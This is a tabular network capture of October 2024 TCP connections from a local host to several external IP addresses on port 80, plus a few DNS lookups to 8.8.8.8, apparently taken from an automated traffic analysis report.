                                                                                        Oct 9, 2024 12:53:23.787058115 CEST4918580192.168.2.22217.70.184.50
                                                                                        Oct 9, 2024 12:53:24.693713903 CEST4918580192.168.2.22217.70.184.50
                                                                                        Oct 9, 2024 12:53:25.708707094 CEST4918680192.168.2.22217.70.184.50
                                                                                        Oct 9, 2024 12:53:25.713597059 CEST8049186217.70.184.50192.168.2.22
                                                                                        Oct 9, 2024 12:53:25.713826895 CEST4918680192.168.2.22217.70.184.50
                                                                                        Oct 9, 2024 12:53:25.724104881 CEST4918680192.168.2.22217.70.184.50
                                                                                        Oct 9, 2024 12:53:25.729059935 CEST8049186217.70.184.50192.168.2.22
                                                                                        Oct 9, 2024 12:53:26.318517923 CEST8049186217.70.184.50192.168.2.22
                                                                                        Oct 9, 2024 12:53:26.318531036 CEST8049186217.70.184.50192.168.2.22
                                                                                        Oct 9, 2024 12:53:26.318583965 CEST4918680192.168.2.22217.70.184.50
                                                                                        Oct 9, 2024 12:53:27.244188070 CEST4918680192.168.2.22217.70.184.50
                                                                                        Oct 9, 2024 12:53:28.252196074 CEST4918780192.168.2.22217.70.184.50
                                                                                        Oct 9, 2024 12:53:28.257251978 CEST8049187217.70.184.50192.168.2.22
                                                                                        Oct 9, 2024 12:53:28.257335901 CEST4918780192.168.2.22217.70.184.50
                                                                                        Oct 9, 2024 12:53:28.268337965 CEST4918780192.168.2.22217.70.184.50
                                                                                        Oct 9, 2024 12:53:28.273500919 CEST8049187217.70.184.50192.168.2.22
                                                                                        Oct 9, 2024 12:53:28.273570061 CEST4918780192.168.2.22217.70.184.50
                                                                                        Oct 9, 2024 12:53:28.273781061 CEST8049187217.70.184.50192.168.2.22
                                                                                        Oct 9, 2024 12:53:28.278578043 CEST8049187217.70.184.50192.168.2.22
                                                                                        Oct 9, 2024 12:53:28.278592110 CEST8049187217.70.184.50192.168.2.22
                                                                                        Oct 9, 2024 12:53:28.969506025 CEST8049187217.70.184.50192.168.2.22
                                                                                        Oct 9, 2024 12:53:28.969522953 CEST8049187217.70.184.50192.168.2.22
                                                                                        Oct 9, 2024 12:53:28.969718933 CEST4918780192.168.2.22217.70.184.50
                                                                                        Oct 9, 2024 12:53:29.779119968 CEST4918780192.168.2.22217.70.184.50
                                                                                        Oct 9, 2024 12:53:30.818907022 CEST4918880192.168.2.22217.70.184.50
                                                                                        Oct 9, 2024 12:53:30.823817015 CEST8049188217.70.184.50192.168.2.22
                                                                                        Oct 9, 2024 12:53:30.823903084 CEST4918880192.168.2.22217.70.184.50
                                                                                        Oct 9, 2024 12:53:30.864892006 CEST4918880192.168.2.22217.70.184.50
                                                                                        Oct 9, 2024 12:53:30.869817972 CEST8049188217.70.184.50192.168.2.22
                                                                                        Oct 9, 2024 12:53:31.428801060 CEST8049188217.70.184.50192.168.2.22
                                                                                        Oct 9, 2024 12:53:31.428817034 CEST8049188217.70.184.50192.168.2.22
                                                                                        Oct 9, 2024 12:53:31.428913116 CEST8049188217.70.184.50192.168.2.22
                                                                                        Oct 9, 2024 12:53:31.428915024 CEST4918880192.168.2.22217.70.184.50
                                                                                        Oct 9, 2024 12:53:31.428982019 CEST4918880192.168.2.22217.70.184.50
                                                                                        Oct 9, 2024 12:53:31.431655884 CEST4918880192.168.2.22217.70.184.50
                                                                                        Oct 9, 2024 12:53:31.436558962 CEST8049188217.70.184.50192.168.2.22
                                                                                        Oct 9, 2024 12:53:36.469856024 CEST4918980192.168.2.2254.38.220.85
                                                                                        Oct 9, 2024 12:53:36.475047112 CEST804918954.38.220.85192.168.2.22
                                                                                        Oct 9, 2024 12:53:36.481882095 CEST4918980192.168.2.2254.38.220.85
                                                                                        Oct 9, 2024 12:53:36.489299059 CEST4918980192.168.2.2254.38.220.85
                                                                                        Oct 9, 2024 12:53:36.494637012 CEST804918954.38.220.85192.168.2.22
                                                                                        Oct 9, 2024 12:53:36.494678020 CEST804918954.38.220.85192.168.2.22
                                                                                        Oct 9, 2024 12:53:36.502496958 CEST4918980192.168.2.2254.38.220.85
                                                                                        Oct 9, 2024 12:53:36.507780075 CEST804918954.38.220.85192.168.2.22
                                                                                        Oct 9, 2024 12:53:37.224936008 CEST804918954.38.220.85192.168.2.22
                                                                                        Oct 9, 2024 12:53:37.224991083 CEST4918980192.168.2.2254.38.220.85
                                                                                        Oct 9, 2024 12:53:37.999041080 CEST4918980192.168.2.2254.38.220.85
                                                                                        Oct 9, 2024 12:53:38.004067898 CEST804918954.38.220.85192.168.2.22
                                                                                        Oct 9, 2024 12:53:39.019406080 CEST4919080192.168.2.2254.38.220.85
                                                                                        Oct 9, 2024 12:53:39.212703943 CEST804919054.38.220.85192.168.2.22
                                                                                        Oct 9, 2024 12:53:39.212760925 CEST4919080192.168.2.2254.38.220.85
                                                                                        Oct 9, 2024 12:53:39.225203991 CEST4919080192.168.2.2254.38.220.85
                                                                                        Oct 9, 2024 12:53:39.230006933 CEST804919054.38.220.85192.168.2.22
                                                                                        Oct 9, 2024 12:53:39.969150066 CEST804919054.38.220.85192.168.2.22
                                                                                        Oct 9, 2024 12:53:39.969207048 CEST4919080192.168.2.2254.38.220.85
                                                                                        Oct 9, 2024 12:53:40.731251001 CEST4919080192.168.2.2254.38.220.85
                                                                                        Oct 9, 2024 12:53:40.736316919 CEST804919054.38.220.85192.168.2.22
                                                                                        Oct 9, 2024 12:53:41.745848894 CEST4919180192.168.2.2254.38.220.85
                                                                                        Oct 9, 2024 12:53:41.752157927 CEST804919154.38.220.85192.168.2.22
                                                                                        Oct 9, 2024 12:53:41.752244949 CEST4919180192.168.2.2254.38.220.85
                                                                                        Oct 9, 2024 12:53:41.762655020 CEST4919180192.168.2.2254.38.220.85
                                                                                        Oct 9, 2024 12:53:41.769578934 CEST804919154.38.220.85192.168.2.22
                                                                                        Oct 9, 2024 12:53:41.769640923 CEST4919180192.168.2.2254.38.220.85
                                                                                        Oct 9, 2024 12:53:41.770558119 CEST804919154.38.220.85192.168.2.22
                                                                                        Oct 9, 2024 12:53:41.776478052 CEST804919154.38.220.85192.168.2.22
                                                                                        Oct 9, 2024 12:53:41.777338028 CEST804919154.38.220.85192.168.2.22
                                                                                        Oct 9, 2024 12:53:42.415608883 CEST804919154.38.220.85192.168.2.22
                                                                                        Oct 9, 2024 12:53:42.418915033 CEST4919180192.168.2.2254.38.220.85
                                                                                        Oct 9, 2024 12:53:43.271857977 CEST4919180192.168.2.2254.38.220.85
                                                                                        Oct 9, 2024 12:53:43.277004004 CEST804919154.38.220.85192.168.2.22
                                                                                        Oct 9, 2024 12:53:44.291112900 CEST4919280192.168.2.2254.38.220.85
                                                                                        Oct 9, 2024 12:53:44.296164036 CEST804919254.38.220.85192.168.2.22
                                                                                        Oct 9, 2024 12:53:44.301172972 CEST4919280192.168.2.2254.38.220.85
                                                                                        Oct 9, 2024 12:53:44.304897070 CEST4919280192.168.2.2254.38.220.85
                                                                                        Oct 9, 2024 12:53:44.309760094 CEST804919254.38.220.85192.168.2.22
                                                                                        Oct 9, 2024 12:53:45.024158001 CEST804919254.38.220.85192.168.2.22
                                                                                        Oct 9, 2024 12:53:45.024173975 CEST804919254.38.220.85192.168.2.22
                                                                                        Oct 9, 2024 12:53:45.024185896 CEST804919254.38.220.85192.168.2.22
                                                                                        Oct 9, 2024 12:53:45.024324894 CEST4919280192.168.2.2254.38.220.85
                                                                                        Oct 9, 2024 12:53:45.024452925 CEST804919254.38.220.85192.168.2.22
                                                                                        Oct 9, 2024 12:53:45.024514914 CEST804919254.38.220.85192.168.2.22
                                                                                        Oct 9, 2024 12:53:45.024525881 CEST804919254.38.220.85192.168.2.22
                                                                                        Oct 9, 2024 12:53:45.024612904 CEST804919254.38.220.85192.168.2.22
                                                                                        Oct 9, 2024 12:53:45.024640083 CEST4919280192.168.2.2254.38.220.85
                                                                                        Oct 9, 2024 12:53:45.024671078 CEST804919254.38.220.85192.168.2.22
                                                                                        Oct 9, 2024 12:53:45.026640892 CEST4919280192.168.2.2254.38.220.85
                                                                                        Oct 9, 2024 12:53:45.033413887 CEST4919280192.168.2.2254.38.220.85
                                                                                        Oct 9, 2024 12:53:45.038270950 CEST804919254.38.220.85192.168.2.22
                                                                                        Oct 9, 2024 12:53:50.223113060 CEST4919380192.168.2.22103.224.182.242
                                                                                        Oct 9, 2024 12:53:50.228063107 CEST8049193103.224.182.242192.168.2.22
                                                                                        Oct 9, 2024 12:53:50.228526115 CEST4919380192.168.2.22103.224.182.242
                                                                                        Oct 9, 2024 12:53:50.238217115 CEST4919380192.168.2.22103.224.182.242
                                                                                        Oct 9, 2024 12:53:50.244343042 CEST8049193103.224.182.242192.168.2.22
                                                                                        Oct 9, 2024 12:53:50.244391918 CEST8049193103.224.182.242192.168.2.22
                                                                                        Oct 9, 2024 12:53:50.244862080 CEST4919380192.168.2.22103.224.182.242
                                                                                        Oct 9, 2024 12:53:50.249871016 CEST8049193103.224.182.242192.168.2.22
                                                                                        Oct 9, 2024 12:53:50.856524944 CEST8049193103.224.182.242192.168.2.22
                                                                                        Oct 9, 2024 12:53:50.856600046 CEST8049193103.224.182.242192.168.2.22
                                                                                        Oct 9, 2024 12:53:50.857285976 CEST4919380192.168.2.22103.224.182.242
                                                                                        Oct 9, 2024 12:53:51.742958069 CEST4919380192.168.2.22103.224.182.242
                                                                                        Oct 9, 2024 12:53:52.759644985 CEST4919480192.168.2.22103.224.182.242
                                                                                        Oct 9, 2024 12:53:52.764777899 CEST8049194103.224.182.242192.168.2.22
                                                                                        Oct 9, 2024 12:53:52.765161037 CEST4919480192.168.2.22103.224.182.242
                                                                                        Oct 9, 2024 12:53:52.774142981 CEST4919480192.168.2.22103.224.182.242
                                                                                        Oct 9, 2024 12:53:52.779220104 CEST8049194103.224.182.242192.168.2.22
                                                                                        Oct 9, 2024 12:53:53.369410992 CEST8049194103.224.182.242192.168.2.22
                                                                                        Oct 9, 2024 12:53:53.369622946 CEST8049194103.224.182.242192.168.2.22
                                                                                        Oct 9, 2024 12:53:53.369682074 CEST4919480192.168.2.22103.224.182.242
                                                                                        Oct 9, 2024 12:53:54.285485983 CEST4919480192.168.2.22103.224.182.242
                                                                                        Oct 9, 2024 12:53:55.310749054 CEST4919580192.168.2.22103.224.182.242
                                                                                        Oct 9, 2024 12:53:55.315702915 CEST8049195103.224.182.242192.168.2.22
                                                                                        Oct 9, 2024 12:53:55.315758944 CEST4919580192.168.2.22103.224.182.242
                                                                                        Oct 9, 2024 12:53:55.324960947 CEST4919580192.168.2.22103.224.182.242
                                                                                        Oct 9, 2024 12:53:55.329857111 CEST8049195103.224.182.242192.168.2.22
                                                                                        Oct 9, 2024 12:53:55.329914093 CEST8049195103.224.182.242192.168.2.22
                                                                                        Oct 9, 2024 12:53:55.329926968 CEST4919580192.168.2.22103.224.182.242
                                                                                        Oct 9, 2024 12:53:55.334731102 CEST8049195103.224.182.242192.168.2.22
                                                                                        Oct 9, 2024 12:53:55.334758997 CEST8049195103.224.182.242192.168.2.22
                                                                                        Oct 9, 2024 12:53:55.969247103 CEST8049195103.224.182.242192.168.2.22
                                                                                        Oct 9, 2024 12:53:55.969347954 CEST8049195103.224.182.242192.168.2.22
                                                                                        Oct 9, 2024 12:53:55.969413042 CEST4919580192.168.2.22103.224.182.242
                                                                                        Oct 9, 2024 12:53:56.829341888 CEST4919580192.168.2.22103.224.182.242
                                                                                        Oct 9, 2024 12:53:57.844715118 CEST4919680192.168.2.22103.224.182.242
                                                                                        Oct 9, 2024 12:53:57.849939108 CEST8049196103.224.182.242192.168.2.22
                                                                                        Oct 9, 2024 12:53:57.849998951 CEST4919680192.168.2.22103.224.182.242
                                                                                        Oct 9, 2024 12:53:57.855998039 CEST4919680192.168.2.22103.224.182.242
                                                                                        Oct 9, 2024 12:53:57.860794067 CEST8049196103.224.182.242192.168.2.22
                                                                                        Oct 9, 2024 12:53:58.533315897 CEST8049196103.224.182.242192.168.2.22
                                                                                        Oct 9, 2024 12:53:58.533339977 CEST8049196103.224.182.242192.168.2.22
                                                                                        Oct 9, 2024 12:53:58.533355951 CEST8049196103.224.182.242192.168.2.22
                                                                                        Oct 9, 2024 12:53:58.533365965 CEST8049196103.224.182.242192.168.2.22
                                                                                        Oct 9, 2024 12:53:58.533912897 CEST4919680192.168.2.22103.224.182.242
                                                                                        Oct 9, 2024 12:53:58.536129951 CEST4919680192.168.2.22103.224.182.242
                                                                                        Oct 9, 2024 12:53:58.540961027 CEST8049196103.224.182.242192.168.2.22
                                                                                        Oct 9, 2024 12:54:03.590863943 CEST4919780192.168.2.22209.74.64.187
                                                                                        Oct 9, 2024 12:54:03.595802069 CEST8049197209.74.64.187192.168.2.22
                                                                                        Oct 9, 2024 12:54:03.595855951 CEST4919780192.168.2.22209.74.64.187
                                                                                        Oct 9, 2024 12:54:03.608346939 CEST4919780192.168.2.22209.74.64.187
                                                                                        Oct 9, 2024 12:54:03.613269091 CEST8049197209.74.64.187192.168.2.22
                                                                                        Oct 9, 2024 12:54:03.613315105 CEST4919780192.168.2.22209.74.64.187
                                                                                        Oct 9, 2024 12:54:03.613332033 CEST8049197209.74.64.187192.168.2.22
                                                                                        Oct 9, 2024 12:54:03.618537903 CEST8049197209.74.64.187192.168.2.22
                                                                                        Oct 9, 2024 12:54:04.212234974 CEST8049197209.74.64.187192.168.2.22
                                                                                        Oct 9, 2024 12:54:04.212326050 CEST8049197209.74.64.187192.168.2.22
                                                                                        Oct 9, 2024 12:54:04.213738918 CEST4919780192.168.2.22209.74.64.187
                                                                                        Oct 9, 2024 12:54:05.127413034 CEST4919780192.168.2.22209.74.64.187
                                                                                        Oct 9, 2024 12:54:06.159537077 CEST4919880192.168.2.22209.74.64.187
                                                                                        Oct 9, 2024 12:54:06.164554119 CEST8049198209.74.64.187192.168.2.22
                                                                                        Oct 9, 2024 12:54:06.164624929 CEST4919880192.168.2.22209.74.64.187
                                                                                        Oct 9, 2024 12:54:06.173465014 CEST4919880192.168.2.22209.74.64.187
                                                                                        Oct 9, 2024 12:54:06.178570986 CEST8049198209.74.64.187192.168.2.22
                                                                                        Oct 9, 2024 12:54:06.864512920 CEST8049198209.74.64.187192.168.2.22
                                                                                        Oct 9, 2024 12:54:06.864573002 CEST8049198209.74.64.187192.168.2.22
                                                                                        Oct 9, 2024 12:54:06.864648104 CEST4919880192.168.2.22209.74.64.187
                                                                                        Oct 9, 2024 12:54:07.695719004 CEST4919880192.168.2.22209.74.64.187
                                                                                        Oct 9, 2024 12:54:08.703075886 CEST4919980192.168.2.22209.74.64.187
                                                                                        Oct 9, 2024 12:54:08.708044052 CEST8049199209.74.64.187192.168.2.22
                                                                                        Oct 9, 2024 12:54:08.708108902 CEST4919980192.168.2.22209.74.64.187
                                                                                        Oct 9, 2024 12:54:08.717849970 CEST4919980192.168.2.22209.74.64.187
                                                                                        Oct 9, 2024 12:54:08.722683907 CEST8049199209.74.64.187192.168.2.22
                                                                                        Oct 9, 2024 12:54:08.722747087 CEST4919980192.168.2.22209.74.64.187
                                                                                        Oct 9, 2024 12:54:08.722902060 CEST8049199209.74.64.187192.168.2.22
                                                                                        Oct 9, 2024 12:54:08.727714062 CEST8049199209.74.64.187192.168.2.22
                                                                                        Oct 9, 2024 12:54:08.728215933 CEST8049199209.74.64.187192.168.2.22
                                                                                        Oct 9, 2024 12:54:09.367147923 CEST8049199209.74.64.187192.168.2.22
                                                                                        Oct 9, 2024 12:54:09.367234945 CEST8049199209.74.64.187192.168.2.22
                                                                                        Oct 9, 2024 12:54:09.367290020 CEST4919980192.168.2.22209.74.64.187
                                                                                        Oct 9, 2024 12:54:10.229260921 CEST4919980192.168.2.22209.74.64.187
                                                                                        Oct 9, 2024 12:54:11.276736021 CEST4920080192.168.2.22209.74.64.187
                                                                                        Oct 9, 2024 12:54:11.281791925 CEST8049200209.74.64.187192.168.2.22
                                                                                        Oct 9, 2024 12:54:11.281855106 CEST4920080192.168.2.22209.74.64.187
                                                                                        Oct 9, 2024 12:54:11.484874964 CEST4920080192.168.2.22209.74.64.187
                                                                                        Oct 9, 2024 12:54:11.489850998 CEST8049200209.74.64.187192.168.2.22
                                                                                        Oct 9, 2024 12:54:11.866625071 CEST8049200209.74.64.187192.168.2.22
                                                                                        Oct 9, 2024 12:54:11.868073940 CEST8049200209.74.64.187192.168.2.22
                                                                                        Oct 9, 2024 12:54:11.868125916 CEST4920080192.168.2.22209.74.64.187
                                                                                        Oct 9, 2024 12:54:11.895612955 CEST4920080192.168.2.22209.74.64.187
                                                                                        Oct 9, 2024 12:54:11.900517941 CEST8049200209.74.64.187192.168.2.22
                                                                                        Oct 9, 2024 12:54:16.975439072 CEST4920180192.168.2.2265.21.196.90
                                                                                        Oct 9, 2024 12:54:16.980559111 CEST804920165.21.196.90192.168.2.22
                                                                                        Oct 9, 2024 12:54:16.980628967 CEST4920180192.168.2.2265.21.196.90
                                                                                        Oct 9, 2024 12:54:16.992212057 CEST4920180192.168.2.2265.21.196.90
                                                                                        Oct 9, 2024 12:54:16.997203112 CEST804920165.21.196.90192.168.2.22
                                                                                        Oct 9, 2024 12:54:16.997229099 CEST804920165.21.196.90192.168.2.22
                                                                                        Oct 9, 2024 12:54:16.997250080 CEST4920180192.168.2.2265.21.196.90
                                                                                        Oct 9, 2024 12:54:17.002878904 CEST804920165.21.196.90192.168.2.22
                                                                                        Oct 9, 2024 12:54:17.648829937 CEST804920165.21.196.90192.168.2.22
                                                                                        Oct 9, 2024 12:54:17.648880005 CEST804920165.21.196.90192.168.2.22
                                                                                        Oct 9, 2024 12:54:17.649259090 CEST4920180192.168.2.2265.21.196.90
                                                                                        Oct 9, 2024 12:54:18.515983105 CEST4920180192.168.2.2265.21.196.90
                                                                                        Oct 9, 2024 12:54:19.529449940 CEST4920280192.168.2.2265.21.196.90
                                                                                        Oct 9, 2024 12:54:19.534461975 CEST804920265.21.196.90192.168.2.22
                                                                                        Oct 9, 2024 12:54:19.534514904 CEST4920280192.168.2.2265.21.196.90
                                                                                        Oct 9, 2024 12:54:19.544423103 CEST4920280192.168.2.2265.21.196.90
                                                                                        Oct 9, 2024 12:54:19.549424887 CEST804920265.21.196.90192.168.2.22
                                                                                        Oct 9, 2024 12:54:20.206110954 CEST804920265.21.196.90192.168.2.22
                                                                                        Oct 9, 2024 12:54:20.206168890 CEST804920265.21.196.90192.168.2.22
                                                                                        Oct 9, 2024 12:54:20.206306934 CEST4920280192.168.2.2265.21.196.90
                                                                                        Oct 9, 2024 12:54:21.055282116 CEST4920280192.168.2.2265.21.196.90
                                                                                        Oct 9, 2024 12:54:22.071688890 CEST4920380192.168.2.2265.21.196.90
                                                                                        Oct 9, 2024 12:54:22.076805115 CEST804920365.21.196.90192.168.2.22
                                                                                        Oct 9, 2024 12:54:22.076948881 CEST4920380192.168.2.2265.21.196.90
                                                                                        Oct 9, 2024 12:54:22.085834980 CEST4920380192.168.2.2265.21.196.90
                                                                                        Oct 9, 2024 12:54:22.091308117 CEST804920365.21.196.90192.168.2.22
                                                                                        Oct 9, 2024 12:54:22.091339111 CEST804920365.21.196.90192.168.2.22
                                                                                        Oct 9, 2024 12:54:22.091367960 CEST4920380192.168.2.2265.21.196.90
                                                                                        Oct 9, 2024 12:54:22.096343040 CEST804920365.21.196.90192.168.2.22
                                                                                        Oct 9, 2024 12:54:22.096401930 CEST804920365.21.196.90192.168.2.22
                                                                                        Oct 9, 2024 12:54:22.880673885 CEST804920365.21.196.90192.168.2.22
                                                                                        Oct 9, 2024 12:54:22.880717993 CEST804920365.21.196.90192.168.2.22
                                                                                        Oct 9, 2024 12:54:22.881136894 CEST4920380192.168.2.2265.21.196.90
                                                                                        Oct 9, 2024 12:54:23.598005056 CEST4920380192.168.2.2265.21.196.90
                                                                                        Oct 9, 2024 12:54:24.614499092 CEST4920480192.168.2.2265.21.196.90
                                                                                        Oct 9, 2024 12:54:24.619616032 CEST804920465.21.196.90192.168.2.22
                                                                                        Oct 9, 2024 12:54:24.623406887 CEST4920480192.168.2.2265.21.196.90
                                                                                        Oct 9, 2024 12:54:24.627408028 CEST4920480192.168.2.2265.21.196.90
                                                                                        Oct 9, 2024 12:54:24.632308960 CEST804920465.21.196.90192.168.2.22
                                                                                        Oct 9, 2024 12:54:25.290421009 CEST804920465.21.196.90192.168.2.22
                                                                                        Oct 9, 2024 12:54:25.290463924 CEST804920465.21.196.90192.168.2.22
                                                                                        Oct 9, 2024 12:54:25.290589094 CEST4920480192.168.2.2265.21.196.90
                                                                                        Oct 9, 2024 12:54:25.292762995 CEST4920480192.168.2.2265.21.196.90
                                                                                        Oct 9, 2024 12:54:25.297612906 CEST804920465.21.196.90192.168.2.22
                                                                                        Oct 9, 2024 12:54:30.316248894 CEST4920580192.168.2.2215.197.148.33
                                                                                        Oct 9, 2024 12:54:30.321213961 CEST804920515.197.148.33192.168.2.22
                                                                                        Oct 9, 2024 12:54:30.323380947 CEST4920580192.168.2.2215.197.148.33
                                                                                        Oct 9, 2024 12:54:30.335201979 CEST4920580192.168.2.2215.197.148.33
                                                                                        Oct 9, 2024 12:54:30.340323925 CEST804920515.197.148.33192.168.2.22
                                                                                        Oct 9, 2024 12:54:30.340353012 CEST804920515.197.148.33192.168.2.22
                                                                                        Oct 9, 2024 12:54:30.340626001 CEST4920580192.168.2.2215.197.148.33
                                                                                        Oct 9, 2024 12:54:30.345597029 CEST804920515.197.148.33192.168.2.22
                                                                                        Oct 9, 2024 12:54:31.834810972 CEST4920580192.168.2.2215.197.148.33
                                                                                        Oct 9, 2024 12:54:31.840465069 CEST804920515.197.148.33192.168.2.22
                                                                                        Oct 9, 2024 12:54:31.840573072 CEST4920580192.168.2.2215.197.148.33
                                                                                        Oct 9, 2024 12:54:32.851778984 CEST4920680192.168.2.2215.197.148.33
                                                                                        Oct 9, 2024 12:54:32.857187986 CEST804920615.197.148.33192.168.2.22
                                                                                        Oct 9, 2024 12:54:32.863200903 CEST4920680192.168.2.2215.197.148.33
                                                                                        Oct 9, 2024 12:54:32.867011070 CEST4920680192.168.2.2215.197.148.33
                                                                                        Oct 9, 2024 12:54:32.873280048 CEST804920615.197.148.33192.168.2.22
                                                                                        Oct 9, 2024 12:54:33.333731890 CEST804920615.197.148.33192.168.2.22
                                                                                        Oct 9, 2024 12:54:33.333791018 CEST4920680192.168.2.2215.197.148.33
                                                                                        Oct 9, 2024 12:54:34.377655983 CEST4920680192.168.2.2215.197.148.33
                                                                                        Oct 9, 2024 12:54:34.382705927 CEST804920615.197.148.33192.168.2.22
                                                                                        Oct 9, 2024 12:54:35.394068003 CEST4920780192.168.2.2215.197.148.33
                                                                                        Oct 9, 2024 12:54:35.575548887 CEST804920715.197.148.33192.168.2.22
                                                                                        Oct 9, 2024 12:54:35.575632095 CEST4920780192.168.2.2215.197.148.33
                                                                                        Oct 9, 2024 12:54:35.586138010 CEST4920780192.168.2.2215.197.148.33
                                                                                        Oct 9, 2024 12:54:35.591142893 CEST804920715.197.148.33192.168.2.22
                                                                                        Oct 9, 2024 12:54:35.591183901 CEST804920715.197.148.33192.168.2.22
                                                                                        Oct 9, 2024 12:54:35.591212034 CEST4920780192.168.2.2215.197.148.33
                                                                                        Oct 9, 2024 12:54:35.596121073 CEST804920715.197.148.33192.168.2.22
                                                                                        Oct 9, 2024 12:54:35.596225977 CEST804920715.197.148.33192.168.2.22
                                                                                        Oct 9, 2024 12:54:36.987106085 CEST804920715.197.148.33192.168.2.22
                                                                                        Oct 9, 2024 12:54:36.987271070 CEST4920780192.168.2.2215.197.148.33
                                                                                        Oct 9, 2024 12:54:37.092020988 CEST4920780192.168.2.2215.197.148.33
                                                                                        Oct 9, 2024 12:54:37.097302914 CEST804920715.197.148.33192.168.2.22
                                                                                        Oct 9, 2024 12:54:38.109155893 CEST4920880192.168.2.2215.197.148.33
                                                                                        Oct 9, 2024 12:54:38.114228010 CEST804920815.197.148.33192.168.2.22
                                                                                        Oct 9, 2024 12:54:38.114304066 CEST4920880192.168.2.2215.197.148.33
                                                                                        Oct 9, 2024 12:54:38.120285034 CEST4920880192.168.2.2215.197.148.33
                                                                                        Oct 9, 2024 12:54:38.125226021 CEST804920815.197.148.33192.168.2.22
                                                                                        Oct 9, 2024 12:54:38.869396925 CEST804920815.197.148.33192.168.2.22
                                                                                        Oct 9, 2024 12:54:38.869626999 CEST804920815.197.148.33192.168.2.22
                                                                                        Oct 9, 2024 12:54:38.869657993 CEST804920815.197.148.33192.168.2.22
                                                                                        Oct 9, 2024 12:54:38.869766951 CEST804920815.197.148.33192.168.2.22
                                                                                        Oct 9, 2024 12:54:38.869836092 CEST4920880192.168.2.2215.197.148.33
                                                                                        Oct 9, 2024 12:54:38.869836092 CEST4920880192.168.2.2215.197.148.33
                                                                                        Oct 9, 2024 12:54:38.873996973 CEST4920880192.168.2.2215.197.148.33
                                                                                        Oct 9, 2024 12:54:38.879328966 CEST804920815.197.148.33192.168.2.22
                                                                                        Oct 9, 2024 12:54:43.918356895 CEST4920980192.168.2.223.33.130.190
                                                                                        Oct 9, 2024 12:54:43.923516035 CEST80492093.33.130.190192.168.2.22
                                                                                        Oct 9, 2024 12:54:43.923583031 CEST4920980192.168.2.223.33.130.190
                                                                                        Oct 9, 2024 12:54:43.943067074 CEST4920980192.168.2.223.33.130.190
                                                                                        Oct 9, 2024 12:54:43.948173046 CEST80492093.33.130.190192.168.2.22
                                                                                        Oct 9, 2024 12:54:43.948226929 CEST80492093.33.130.190192.168.2.22
                                                                                        Oct 9, 2024 12:54:43.948227882 CEST4920980192.168.2.223.33.130.190
                                                                                        Oct 9, 2024 12:54:43.953172922 CEST80492093.33.130.190192.168.2.22
                                                                                        Oct 9, 2024 12:54:45.453636885 CEST4920980192.168.2.223.33.130.190
                                                                                        Oct 9, 2024 12:54:45.730662107 CEST80492093.33.130.190192.168.2.22
                                                                                        Oct 9, 2024 12:54:45.730743885 CEST4920980192.168.2.223.33.130.190
                                                                                        Oct 9, 2024 12:54:46.471219063 CEST4921080192.168.2.223.33.130.190
                                                                                        Oct 9, 2024 12:54:46.476382017 CEST80492103.33.130.190192.168.2.22
                                                                                        Oct 9, 2024 12:54:46.479212046 CEST4921080192.168.2.223.33.130.190
                                                                                        Oct 9, 2024 12:54:46.486243963 CEST4921080192.168.2.223.33.130.190
                                                                                        Oct 9, 2024 12:54:46.491167068 CEST80492103.33.130.190192.168.2.22
                                                                                        Oct 9, 2024 12:54:46.953331947 CEST80492103.33.130.190192.168.2.22
                                                                                        Oct 9, 2024 12:54:46.957320929 CEST4921080192.168.2.223.33.130.190
                                                                                        Oct 9, 2024 12:54:47.996551991 CEST4921080192.168.2.223.33.130.190
                                                                                        Oct 9, 2024 12:54:48.002144098 CEST80492103.33.130.190192.168.2.22
                                                                                        Oct 9, 2024 12:54:49.012959003 CEST4921180192.168.2.223.33.130.190
                                                                                        Oct 9, 2024 12:54:49.018208027 CEST80492113.33.130.190192.168.2.22
                                                                                        Oct 9, 2024 12:54:49.025566101 CEST4921180192.168.2.223.33.130.190
                                                                                        Oct 9, 2024 12:54:49.030963898 CEST4921180192.168.2.223.33.130.190
                                                                                        Oct 9, 2024 12:54:49.035958052 CEST80492113.33.130.190192.168.2.22
                                                                                        Oct 9, 2024 12:54:49.036034107 CEST80492113.33.130.190192.168.2.22
                                                                                        Oct 9, 2024 12:54:49.036274910 CEST4921180192.168.2.223.33.130.190
                                                                                        Oct 9, 2024 12:54:49.041315079 CEST80492113.33.130.190192.168.2.22
                                                                                        Oct 9, 2024 12:54:49.041342974 CEST80492113.33.130.190192.168.2.22
                                                                                        Oct 9, 2024 12:54:50.406543970 CEST80492113.33.130.190192.168.2.22
                                                                                        Oct 9, 2024 12:54:50.406672955 CEST4921180192.168.2.223.33.130.190
                                                                                        Oct 9, 2024 12:54:50.542809010 CEST4921180192.168.2.223.33.130.190
                                                                                        Oct 9, 2024 12:54:50.547888994 CEST80492113.33.130.190192.168.2.22
                                                                                        Oct 9, 2024 12:54:51.555682898 CEST4921280192.168.2.223.33.130.190
                                                                                        Oct 9, 2024 12:54:51.561002970 CEST80492123.33.130.190192.168.2.22
                                                                                        Oct 9, 2024 12:54:51.561068058 CEST4921280192.168.2.223.33.130.190
                                                                                        Oct 9, 2024 12:54:51.566931009 CEST4921280192.168.2.223.33.130.190
                                                                                        Oct 9, 2024 12:54:51.571885109 CEST80492123.33.130.190192.168.2.22
                                                                                        Oct 9, 2024 12:54:52.153110981 CEST80492123.33.130.190192.168.2.22
                                                                                        Oct 9, 2024 12:54:52.153168917 CEST80492123.33.130.190192.168.2.22
                                                                                        Oct 9, 2024 12:54:52.153198004 CEST80492123.33.130.190192.168.2.22
                                                                                        Oct 9, 2024 12:54:52.153263092 CEST4921280192.168.2.223.33.130.190
                                                                                        Oct 9, 2024 12:54:52.155426979 CEST4921280192.168.2.223.33.130.190
                                                                                        Oct 9, 2024 12:54:52.160414934 CEST80492123.33.130.190192.168.2.22

                                                                                        UDP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Oct 9, 2024 12:51:21.935492992 CEST5456253192.168.2.228.8.8.8
                                                                                        Oct 9, 2024 12:51:21.950959921 CEST53545628.8.8.8192.168.2.22
                                                                                        Oct 9, 2024 12:51:27.491494894 CEST5291753192.168.2.228.8.8.8
                                                                                        Oct 9, 2024 12:51:27.500324011 CEST53529178.8.8.8192.168.2.22
                                                                                        Oct 9, 2024 12:51:37.588501930 CEST6275153192.168.2.228.8.8.8
                                                                                        Oct 9, 2024 12:51:37.604027987 CEST53627518.8.8.8192.168.2.22
                                                                                        Oct 9, 2024 12:51:50.878993034 CEST5789353192.168.2.228.8.8.8
                                                                                        Oct 9, 2024 12:51:50.910748959 CEST53578938.8.8.8192.168.2.22
